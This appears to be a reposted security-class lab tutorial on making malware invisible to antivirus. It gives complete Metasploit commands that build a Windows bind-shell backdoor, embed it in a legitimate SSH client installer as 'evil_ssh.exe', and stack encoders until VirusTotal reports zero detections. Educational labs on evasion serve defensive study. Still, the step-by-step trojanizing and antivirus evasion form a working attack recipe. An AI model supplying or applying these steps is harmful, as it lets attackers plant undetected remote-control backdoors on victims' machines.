What You Need
- A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.
WARNING
We are using some harmless test files, but don't infect people with any real viruses--that's a crime!Purpose
Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use metasploit to render malware completely invisible to antivirus.Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:You should see the listen.exe file,cd msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
Analyzing the Listener with VirusTotal
In BackTrack, click Applications, Internet, "Firefox Web Browser". In Firefox, go to https://www.virustotal.com/Click the "Choose File" button. Navigate to /root and double-click the listen.exe
"listen.exe" appears in the "Choose File" box,
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Saving the Screen Image
Make sure the result is visible, showing something like "Detection rate: 33/42", as shown above. Save a screen capture with a filename of "Proj 6xa from YOUR NAME".Encoding the Listener
This process will encode the listener, and insert it into an innocent SSH file. In BackTrack, in a Terminal window, execute these commands:You should see the evil-ssh.exe file,wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/ Click the "Choose File" button. Navigate to /root and double-click the evil-ssh.exe file.In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it
Encoding the Listener Again
This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!). In BackTrack, in a Terminal window, execute these commands:You should see several filesmsfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1 msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/ Click the "Choose File" button. Navigate to /root and double-click the listen5.exe file.In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it,
No comments:
Post a Comment
We do receive a lot of comments each day and those comments are moderated by the human being not automated robots. So, Please avoid doing spam and posting links in comments otherwise comment will not be published. We can't tolerate anymore. Thanks for understanding!